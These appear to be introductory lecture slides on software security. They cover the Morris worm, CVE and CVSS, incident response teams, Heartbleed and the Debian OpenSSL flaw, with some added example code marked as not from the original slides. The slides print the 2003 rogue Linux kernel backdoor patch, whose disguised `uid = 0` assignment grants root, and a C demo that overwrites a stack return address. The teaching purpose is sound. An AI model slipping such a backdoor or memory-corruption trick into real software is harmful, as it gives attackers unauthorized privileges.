Introduction To Software Security-Slides


Introduction to Software Security

(Wake up, Neo. . . )

Emmanuel Fleury
<[email protected]>

LaBRI, Université de Bordeaux, France

October 8, 2019

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 1 / 53


Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings



Internet is under attack !!!
Newsgroups: comp.risks
Subject: Virus on the Arpanet - Milnet
<[email protected]> Thu, 3 Nov 88 06:46 EST

Hi Gang!

It's now 3:45 AM on Wednesday 3 November 1988. I'm tired, so don't believe
everything that follows... Apparently, there is a massive attack on Unix
systems going on right now.

I have spoken to systems managers at several computers, on both the east & west
coast, and I suspect this may be a system wide problem. Symptom: hundreds or
thousands of jobs start running on a Unix system bringing response to zero.

[...]

This virus is spreading very quickly over the Milnet. Within the past 4 hours,
I have evidence that it has hit >10 sites across the country, both Arpanet and
Milnet sites. I suspect that well over 50 sites have been hit. Most of these
are "major" sites and gateways.

[...]

This is bad news.



An Autopsy of the ’Morris Worm’ Case
Nov. 2, 1988, 6PM (East Coast Time), New-York:
    Morris drops his worm on the network of the MIT Artificial Intelligence Lab.
Nov. 2, 1988, 7PM (East Coast Time), Berkeley:
    The Berkeley main gateway gets infected.
Nov. 3, 1988, 6AM (East Coast Time), All over US:
    After a night spent fighting the worm, system administrators start to gather
    information and organize resistance. At this time about 2,500 backbones are
    down, almost shutting down the Internet.
Nov. 4, 1988, Berkeley, Usenix Conference:
    Many of the most talented system administrators in the US were attending the
    Usenix conference in Berkeley and had to solve the problem remotely from there
    (most of the time by phone, as they could not log on to their servers). A first
    analysis of the worm is presented at one of the workshops and patches start to
    be written.
Several days later:
    The worm is eradicated from the Internet backbones; security updates and
    patches are applied. Morris is arrested at his university.


Sequel of Morris Worm



What We Learned from the Worm
    People are more dependent on information networks than they
    think (nowadays, they also share a lot more sensitive
    information than they think, without being prepared for it);
    Internet is sensitive to massive network attacks;
    Internet security is a worldwide problem.
    There is a need for computer security experts able to deal
    with such alerts: forging patches against new attacks, inventing
    better counter-measures, staying ahead of potential attackers.
    There is a need for central agencies gathering information
    and coordinating efforts about computer security issues.
    There is a need for an international community of experts
    exchanging about computer security in real-time.


Vulnerability Statistics (CERT|CC)

Year    #Vulnerabilities
1999    894
2000    1,020
2001    1,677
2002    2,156
2003    1,527
2004    2,451
2005    4,935
2006    6,610
2007    6,520
2008    5,632
2009    5,736
2010    4,652
2011    4,155
2012    5,297
2013    5,191
2014    7,946
2015    6,480
2016    6,447
2017    14,714
2018    16,555
2019    424



Computer Security
Security is “the freedom of danger, risk and loss”.

Computer Security
    Data Security: Cryptography, Cryptanalysis, ...
    Protocol Security: Cryptographic Protocols, Network Security, ...
    Software Security: Application Security, Operating System Security, ...

Data Security: Protect/Attack static data;
Protocol Security: Protect/Attack data exchanges;
Software Security: Protect/Attack computer programs.

Software Security Goals
Software Security “Spirit”
Software Security is about preventing/finding misuse of computer programs in
order to gain unauthorized capabilities or knowledge.

Application Security:
    Lies in user-space;
    Concerned about usual programming errors:
    Buffer-overflows, heap-overflows, format string bugs, . . .

Operating System Security:
    Lies in kernel-space;
    Concerned about structural security:
    Access control, randomization of process memory layout,
    data execution prevention, . . .

Software Obfuscation/Reverse-engineering:
    Extracting knowledge from pieces of software:
    Disassembler, cfg-recovery, decompiler, obfuscators, . . .

[Figure labels: Attacker, Users, Root, Kernel]


Security Flaws: Why ?

    Computer programs are complex and long!
    They need experts to be handled properly.
    Programs interact with each other in unpredictable ways.
    Networks amplify program interactions by several orders of magnitude.
    Internet is an extremely hostile place where you cannot hide.
    What You See Is Not What You eXecute (WYSINWYX).
    (see next slides. . . )


Architectural Models
Harvard Architecture
    First implemented in the Mark I (1944).
    Keeps program and data separated.
    Allows fetching data and instructions at the same time.
    Simple to handle for programmers but less powerful for computers.
    [Figure: CPU linked by two separate buses to Program Memory and Data Memory]

Princeton Architecture
    First implemented in the ENIAC (1946).
    Allows self-modifying code and entanglement of program and data.
    Difficult to handle for programmers but more powerful for computers.
    [Figure: CPU linked by one bus to a single Memory (program and data)]


What Consequences on Real World?
Facts about modern software:
    Programmers are coding in Harvard architecture.
    Machines are executing code in Princeton architecture.
    Compilers translate code from Harvard to Princeton architecture.
But a little is lost in translation. . . and some bugs may allow malicious users
to access unauthorized features through unexpected behaviors.

Most of the security issues in software security come from a misunderstanding
of the coupling of these two architectures.
And some computer security experts see exploitation as
“Programming Weird Machine”
(using such a “machine” outside of its specifications).

∗ “What You See Is Not What You Execute” (WYSINWYX) is a term coined by Gogul Balakrishnan and Thomas Reps in 2007.


A Magic Example

    #include <stdio.h>
    #include <stdint.h>

    int foo (void) {
      char buffer[8];
      char * ret;

      /* ret points 24 bytes past the start of the 8-byte buffer,
         that is, outside the array and elsewhere on the stack */
      ret = buffer + 24;
      (*ret) += 7;   /* add 7 to the byte stored there */

      return 0;
    }

    int main (void) {
      int i = 0;
      foo ();
      i = 1;
      printf ("%d\n", i);
      return 0;
    }

What will be the output?
    1 ‘1’
    2 ‘0’
    3 ‘-1’
    4 ‘Segmentation fault’

Let’s try it!




Managing Security Vulnerabilities

Discovering and Listing all the known vulnerabilities.

Registering Security Issue Process
    1 Discover: Find a potential threat in a product;
    2 Submission: Notification by users or analysts on a specific product;
    3 Triage: Recognize already registered issues and drop them;
    4 Registration: Give a recognizable name;
    5 Analysis: Understand the issue in depth;
    6 Fix: Solve the issue in the product.

We need a unique ID for each vulnerability!
    Helps to quickly identify and analyze a vulnerability.
    Requires a central structure to assign IDs!

Common Vulnerabilities and Exposures

CVE Numbering Authority (CNA)
    CNA are entities in charge of triaging issue submissions and analyzing them.
    Each product (or family of products) has a dedicated CNA.

[Figure: CVE assignment flow: Discover, Submit, Triage (Known Issue, or
Candidate ID CVE-YYYY-NNNN...N), Analysis (Not an Issue, or Official CVE ID
CVE-YYYY-NNNN...N)]

CVE - 2014 - 0224
    CVE: CVE prefix
    2014: Year of discovery
    0224: Unique ID assigned by CNA

Each CVE Identifier includes:
    CVE Identifier number (CVE-1999-0067, CVE-2014-100001)
    Brief description of the security vulnerability or exposure.
    Any pertinent references (vulnerability reports and advisories).

Examples
    CVE-2014-0160 (Heartbleed)
    CVE-2014-6271 (Shellshock)
    CVE-2015-0235 (GHOST: glibc vulnerability)
    CVE-2016-0800 (DROWN Attack)
    CVE-2016-5195 (Dirty COW)
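
A strict parser for the CVE-YYYY-NNNN...N syntax shown above, as an added example that is not part of the original slides. The names `struct cve_id`, `parse_cve_id`, `cve_cmp` and the 18-digit cap are assumptions of this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Upper bound on sequence digits, chosen for this example so that the
 * value always fits in an unsigned long long. */
#define MAX_SEQ_DIGITS 18

/* Parsed form of a CVE identifier: CVE-YYYY-NNNN...N */
struct cve_id {
    int year;                 /* YYYY */
    unsigned long long seq;   /* NNNN...N, unique ID assigned by the CNA */
};

/*
 * Strictly parse "CVE-YYYY-NNNN...N".
 * Returns 0 on success and -1 on any deviation: wrong prefix, year that
 * is not exactly four digits, fewer than four sequence digits, more than
 * MAX_SEQ_DIGITS digits, or any trailing byte.
 */
int parse_cve_id(const char *s, struct cve_id *out)
{
    size_t i, ndigits = 0;
    int year = 0;
    unsigned long long seq = 0;

    if (s == NULL || out == NULL || strncmp(s, "CVE-", 4) != 0)
        return -1;
    s += 4;

    /* Year: exactly four digits. A NUL fails isdigit(), so the loop
     * never reads past the end of a short string. */
    for (i = 0; i < 4; i++) {
        if (!isdigit((unsigned char)s[i]))
            return -1;
        year = year * 10 + (s[i] - '0');
    }
    if (s[4] != '-')
        return -1;
    s += 5;

    /* Sequence: four or more digits, nothing after them. */
    while (isdigit((unsigned char)s[ndigits])) {
        if (ndigits == MAX_SEQ_DIGITS)
            return -1;
        seq = seq * 10 + (unsigned long long)(s[ndigits] - '0');
        ndigits++;
    }
    if (ndigits < 4 || s[ndigits] != '\0')
        return -1;

    out->year = year;
    out->seq = seq;
    return 0;
}

/* Order identifiers by year, then by sequence number (usable for sorting
 * a triage list and spotting already registered IDs). */
int cve_cmp(const struct cve_id *a, const struct cve_id *b)
{
    if (a->year != b->year)
        return a->year < b->year ? -1 : 1;
    if (a->seq != b->seq)
        return a->seq < b->seq ? -1 : 1;
    return 0;
}
```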


CNAs List (Software Vendors)
    Adobe Systems Incorporated
    Apache Software Foundation
    Apple Inc.
    BlackBerry
    Brocade Communications Systems, Inc.
    Check Point Software Technologies Ltd.
    Cisco Systems, Inc.
    Debian GNU/Linux
    Dell EMC
    F5 Networks, Inc.
    Fortinet, Inc.
    FreeBSD
    Google Inc. (Chrome and Android issues)
    Hewlett Packard Inc.
    Huawei Technologies Co., Ltd.
    IBM Corporation
    Intel Corporation
    Internet Systems Consortium
    Juniper Networks, Inc.
    Lenovo Group Ltd.
    MarkLogic Corporation
    McAfee (formerly Intel Security)
    Micro Focus
    Microsoft Corporation
    Mozilla Corporation
    Nvidia Corporation
    Objective Development Software GmbH
    OpenSSL Software Foundation
    Oracle
    Puppet
    Red Hat, Inc. (Linux issues only)
    Silicon Graphics, Inc.
    Symantec Corporation
    Ubuntu Linux
    VMWare
    Yandex N.V.


CVE – Issue Sheet

CVE – Homepage

CVE – Web Form Submission
    Request Type
    Request up to 10 IDs
    Confirm vulnerability is still unknown
    Vulnerability Type
    Provide required information

CVE Details – Homepage

CVE Details – Product

CVE Details – Issue


Common Vulnerability Scoring System

Attack Vector (Example)

Type                   Score   Description
Local (L)              0.395   Attacker must either have physical access or a local account.
Adjacent Network (A)   0.646   Attacker must have access to the broadcast or collision domain of the vulnerable system.
Network (N)            1.0     Full remote exploitation.

BaseScore = RoundUp(Min(Impact + Exploitability, 10))

Exploitability = 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

Impact = 10.41 × (1 - (1 - ConfImpact) × (1 - IntegImpact) × (1 - AvailImpact))


Managing Malware Alerts

Report Malware Alerts or Intrusion


1 Discovery: Notification by users or analysts;
2 Triaging: Recognize already registered malware;
3 Registration: Give a recognizable and unique name;
4 Analysis: Understanding the malware in depth;
5 Detection: Get a recognizable signature of it.



Virustotal – Homepage



Virustotal – Virus Scan



Computer Security Incident Response Team

CERT/CSIRT Goals
    Coordinate Alerts and Warnings;
    Incident Handling (analysis and responses);
    Vulnerability Handling (analysis and responses);
    Security Training and Education;
    Intelligence and Research in Security;
    Coordination with other CERT/CSIRT.

French CERT/CSIRT
CERT-FR (French administration)
CERT Crédit Agricole
CERT-DEVOTEAM
Airbus Cybersecurity
Cert-IST (Alcatel, CNES, ELF (Total))
CERT Banque de France
CERT-LAPOSTE
CSIRT ATOS
CERT-LEXSI (Labo. d’EXpertise en Sécurité Informatique)
Airbus Group CERT
CERT-RENATER
CERT Capgemini-Sogeti
CERT-societegenerale
CERT SEKOIA
CERT-XMCO
CERT UBIK
CSIRT-BNP Paribas
CERT Caisse des Dépôts (CERT-CDCFR)
Orange-CERT-CC
CERT OSIRIS (Université de Strasbourg)
CERT-SOLUCOM



CERT-FR – Homepage



On-line Vulnerability Advisory Databases
US Computer Emergency Readiness Team (US-CERT)
http://www.kb.cert.org/vuls/
Common Vulnerabilities and Exposures (CVE)
http://cve.mitre.org/
CVE Details
https://www.cvedetails.com/
Packet Storm Security
https://packetstormsecurity.com/
National Vulnerability Database (NVD)
http://nvd.nist.gov/
Debian Security Advisory (DSA)
http://www.debian.org/security/
Agence Nationale de la Sécurité des Systèmes d’Information (ANSSI)
http://www.ssi.gouv.fr/
CERT-FR
http://cert.ssi.gouv.fr/cert-fr/certfr.html


Typology of Software Security Risks

Threat
A threat is a way for an attacker to misuse the program in an unexpected manner.
Threats are coming from:
Algorithm Flaws: Design error at the algorithmic level.
Program Bugs: Programming error leading to some unexpected behavior.

Threats are potential security issues.

Vulnerability
A vulnerability is a threat which can be used to gain some unexpected advantages.
Vulnerabilities are embodied through:
Proofs of Concept: Program pinpointing the problem (usually not harmful).
Exploits: Program using the problem to effectively gain unauthorized capabilities.
Vulnerabilities are actual security issues.



Where Vulnerabilities can lie ?

Program = Data + Algorithm + and more. . .

Attackers always target the weakest point:


Information Flow
Modify or control data values, inject arbitrary code, . . .

Execution Flow
Modify or control the running process by program counter overwriting,
return-into-libc attacks, symbol overload, . . .

Resources
Exhaust available resources (denial of service), spoof trusted resources
(man-in-the-middle), . . .

Users
Social engineering, malware (trojan horses, viruses, rootkits, . . . ), human mistakes
(weak passwords, bad habits, . . . ).


Vulnerabilities Classification
Remote/Local Exploit
An attacker can exploit it from remote (resp. local) location.
Information Leakage/Disclosure
Some private information can be captured by the attacker.
Identity Theft
The attacker can pretend to be someone else.
Privilege Escalation (Root Exploit)
The attacker can upgrade his privileges (resp. up to the root level).
Arbitrary Command Execution
The attacker can run any program which is available from the target.
Arbitrary Code Execution
The attacker can inject any program in the target and execute it.
Denial of Service
The attacker can deny access (temporarily or permanently) to a service.
...

Examples
Debian Security Advisory (DSA) list

Advisory ID   Package(s)            Correction(s)
DSA 725       ppxp                  Local root exploit
DSA 986       gnutls11              Arbitrary code execution
DSA 1017      Linux Kernel 2.6.8    Several vulnerabilities
DSA 1018      Linux Kernel 2.4.27   Several vulnerabilities
DSA 1027      mailman               Denial of service
DSA 1032      zope-cmfplone         Unprivileged data manipulation
DSA 1035      fcheck                Insecure temporary file creation
DSA 1036      bsdgames              Local privilege escalation
DSA 1037      zgv                   Arbitrary code execution
DSA 1038      xzgv                  Arbitrary code execution
DSA 1039      blender               Several vulnerabilities
DSA 1040      gdm                   Local root exploit
DSA 1041      abc2ps                Arbitrary code execution
DSA 1042      cyrus-sasl2           Denial of service
DSA 1043      abcmidi               Arbitrary code execution
DSA 1044      mozilla-firefox       Several vulnerabilities
DSA 1045      openvpn               Arbitrary code execution
DSA 1046      mozilla               Several vulnerabilities
DSA 1047      resmgr                Unauthorised access
DSA 1048      asterisk              Arbitrary code execution
DSA 1049      ethereal              Several vulnerabilities
DSA 1050      clamav                Arbitrary code execution
...




The Heartbleed Bug
Normal Use
    Step 1: Send a string and the string length to the server;
    Step 2: The server receives the message and replies by sending back the string;
    Step 3: The client gets the string back.

Triggering the Flaw
    Step 1: Send the smallest string possible and the maximum string length
    to the server;
    Step 2: The server receives the message and replies by sending back the
    minimal string and part of the process memory;
    Step 3: The client gets the string back plus extra information.
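
The missing length check behind the two scenarios above, as an added example (not code from the slides or from OpenSSL): a toy echo server in C keeps the request and a constructed secret in one array, with a flawed and a hardened reply routine side by side. The request layout, `struct server` and all function names are assumptions of this example.

```c
#include <stddef.h>
#include <string.h>

#define MEM_SIZE   64
#define SECRET_OFF 16

/* Constructed stand-in for the server's process memory: the request is
 * stored at the start and unrelated secret data sits a few bytes later. */
struct server {
    unsigned char mem[MEM_SIZE];
    size_t received;            /* bytes actually received from the client */
};

/* Toy request layout (an assumption of this example, not the TLS format):
 * byte 0 = string length claimed by the client, bytes 1.. = the string. */
void server_receive(struct server *srv, const unsigned char *req, size_t n)
{
    static const char secret[] = "SECRET-KEY";      /* constructed value */

    if (n > SECRET_OFF)
        n = SECRET_OFF;                 /* request never overlaps the secret */
    memset(srv->mem, 0, sizeof srv->mem);
    memcpy(srv->mem, req, n);
    memcpy(srv->mem + SECRET_OFF, secret, sizeof secret - 1);
    srv->received = n;
}

/* Flawed echo: trusts the claimed length and copies that many bytes,
 * whatever the client really sent. The clamps only keep the demo itself
 * inside the array and the reply buffer. */
size_t echo_trusting(const struct server *srv, unsigned char *reply, size_t cap)
{
    size_t claimed = srv->mem[0];

    if (claimed > MEM_SIZE - 1)
        claimed = MEM_SIZE - 1;
    if (claimed > cap)
        claimed = cap;
    memcpy(reply, srv->mem + 1, claimed);
    return claimed;
}

/* Hardened echo: the claimed length must fit inside what was received;
 * otherwise the request is dropped and nothing is sent back. */
long echo_checked(const struct server *srv, unsigned char *reply, size_t cap)
{
    size_t claimed;

    if (srv->received < 1)
        return -1;
    claimed = srv->mem[0];
    if (claimed > srv->received - 1 || claimed > cap)
        return -1;
    memcpy(reply, srv->mem + 1, claimed);
    return (long)claimed;
}

/* Returns 1 if the byte string needle occurs in buf[0..len). */
int reply_contains(const unsigned char *buf, size_t len, const char *needle)
{
    size_t i, n = strlen(needle);

    for (i = 0; n > 0 && i + n <= len; i++)
        if (memcmp(buf + i, needle, n) == 0)
            return 1;
    return 0;
}
```

The only difference between the two routines is the comparison of the claimed length against the number of bytes received, which is the check the flawed path lacks.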


The Debian OpenSSL Debacle I

CVE-ID: CVE-2008-0166
Description: OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on
Debian-based operating systems uses a random number generator that
generates predictable numbers, which makes it easier for remote attackers to
conduct brute force guessing attacks against cryptographic keys.
References:
MILW0RM:5622
http://www.milw0rm.com/exploits/5622
MILW0RM:5632
http://www.milw0rm.com/exploits/5632
MILW0RM:5720
http://www.milw0rm.com/exploits/5720
DEBIAN:DSA-1571
http://www.debian.org/security/2008/dsa-1571
DEBIAN:DSA-1576
http://www.debian.org/security/2008/dsa-1576
...


The Debian OpenSSL Debacle II
DSA-1571-1 openssl -- predictable random number generator
Date Reported: 13 May 2008
Affected Packages: openssl
Vulnerable: Yes
Security database references: In Mitre's CVE dictionary: CVE-2008-0166.

More information: Luciano Bello discovered that the random number generator in Debian's
openssl package is predictable. This is caused by an incorrect Debian-specific change to the
openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.

This is a Debian-specific vulnerability which does not affect other operating systems
which are not based on Debian. However, other systems can be indirectly affected if
weak keys are imported into them.

It is strongly recommended that all cryptographic key material which has been generated
by OpenSSL versions starting with 0.9.8c-1 on Debian systems is recreated from scratch.
Furthermore, all DSA keys ever used on affected Debian systems for signing or
authentication purposes should be considered compromised; the Digital Signature Algorithm
relies on a secret random value used during signature generation.

The first vulnerable version, 0.9.8c-1, was uploaded to the unstable distribution on
2006-09-17, and has since that date propagated to the testing and current stable (etch)
distributions. The old stable distribution (sarge) is not affected.

Affected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key material for use in
X.509 certificates and session keys used in SSL/TLS connections. Keys generated with GnuPG
or GNUTLS are not affected, though.



Attempt to insert a backdoor in Linux
In November 2003, kernel developers noticed that an attacker tried to sneak a
patch into the kernel sources of kernel/exit.c (see ‘man clone’).

Rogue Patch
--- kernel/exit.c GOOD 2003-11-05 13:46:44.000000000 -0800
+++ kernel/exit.c BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
schedule();
goto repeat;
}
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
retval = -ECHILD;
end_wait4:
current->state = TASK_RUNNING;
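
Review bot: the condition in the first added line uses `current->uid = 0`, an assignment, where a comparison `current->uid == 0` would be expected. As written, whenever options equals (__WCLONE|__WALL) the calling task's uid is set to 0, and because the assignment evaluates to 0 the condition is always false, so `retval = -EINVAL` never executes; it would in any case be overwritten by the unchanged `retval = -ECHILD` on the next line. Nothing in the hunk explains why an option check in this path should touch current->uid at all. Reject as submitted; if an error return for this flag combination is really intended, use `==`, leave the function right after setting retval, and document the reason.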

1 What are the effects of the patch when the flags WCLONE and WALL are true ?
2 Would it be possible to have a remote exploit of this backdoor ?



Goals of the Course
Securing Systems
Be aware of main attacks/counter-measures;
Be able to find information and understand new security
techniques;
Risk evaluation of a computer system or a program.

Secure Programming
Better understanding the limits of software security;
Better knowledge on what is going “backstage”.

Code Security Auditing


Find software weaknesses and estimate threat;
Understand security advisories.



Course Outline
1 Introduction to Software Security
2 Usual Programming Flaws
3 x86 Assembly Language (Part I)
4 x86 Assembly Language (Part II)
5 Executable files
6 Shellcodes
7 Basic stack-overflows
8 Advanced stack-overflows
9 Heap-overflows
10 Format strings and more. . .
11 Obfuscation & Reverse-Engineering
12 Digital Forensic

Grading

Homeworks [1/2]
(challenges from https://www.root-me.org/ (App-system, Cracking))

1 Exam [1/2]
(December, duration: 3h, all documents allowed)


Course Website

Course
http://www.labri.fr/~fleury/courses/software-security/

What you can find on the course website


Syllabus;
Course Agenda;
Slides;
Exercises;
References;
And more. . .
(articles, manuals, books, code samples, . . . ).



References & Further Readings

Magazines
    Misc (Diamond Editions)
    Phrack (http://www.phrack.org)

Blogs and others
    LiveOverflow (https://liveoverflow.com/)
    A Few Thoughts on Cryptographic Engineering
    (http://blog.cryptographyengineering.com/)

Podcasts
    NoLimitSecu (https://www.nolimitsecu.fr/)
    Le Comptoir Sécu (https://www.comptoirsecu.fr/podcast/)
    Security Now (https://www.grc.com/securitynow.htm)


Next Time. . .

Nebula Challenges



Books I
Chris Anley, John Heasman, Felix Linder, and Gerardo Richarte.
The Shellcoder’s Handbook: Discovering and Exploiting Security Holes.
John Wiley & Sons, 2nd edition, 2007.
Bruce Dang, Alexandre Gazet, Elias Bachaalany, and Sébastien Josse.
Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing
Tools, and Obfuscation.
John Wiley & Sons, 2014.
Eldad Eilam.
Reversing: Secrets of Reverse Engineering.
John Wiley & Sons, 2005.
Jon Erickson.
Hacking: The Art of Exploitation.
No Starch Press, 2nd edition, 2007.
Randall Hyde.
The Art of Assembly Language.
No Starch, 2003.



Books II

Michael Hale Ligh, Andrew Case, Jamie Levy, and Aaron Walters.
The Art of Memory Forensics: Detecting Malware and Threats in Windows,
Linux, and Mac Memory.
John Wiley & Sons, 2014.
Ryan O’Neill.
Learning Linux Binary Analysis.
Packt Publishing, 2016.
Robert C. Seacord.
Secure Coding in C and C++.
SEI Series. Addison Wesley, 2nd edition, 2013.
Michael Sikorski and Andrew Honig.
Practical Malware Analysis: A Hands-On Guide to Dissecting Malicious
Software.
No Starch Press, 2012.
